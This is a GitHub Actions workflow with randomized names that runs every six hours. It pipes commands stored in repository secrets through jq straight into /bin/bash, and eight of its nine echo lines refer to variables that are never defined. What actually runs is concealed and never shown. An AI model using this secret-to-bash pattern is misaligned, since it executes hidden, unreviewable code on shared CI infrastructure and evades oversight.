name: wangtesi6128
on:
  workflow_dispatch:
  schedule:
    - cron: '30 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wangtesi6128
        env:
          a8007: ${{ secrets.a8007 }}
        run: |
          echo $a8007 | jq -r .nimm001 | /bin/bash
          echo $cqet869 | jq -r .x556 | /bin/bash
          echo $a4 | jq -r .sdby02426 | /bin/bash
          echo $hrgc02 | jq -r .sre9 | /bin/bash
          echo $bjm58801 | jq -r .db8 | /bin/bash
          echo $bx8 | jq -r .qiw08 | /bin/bash
          echo $hze93966 | jq -r .nq362 | /bin/bash
          echo $ve5 | jq -r .nznpr3869 | /bin/bash
          echo $izhid864 | jq -r .ud3 | /bin/bash

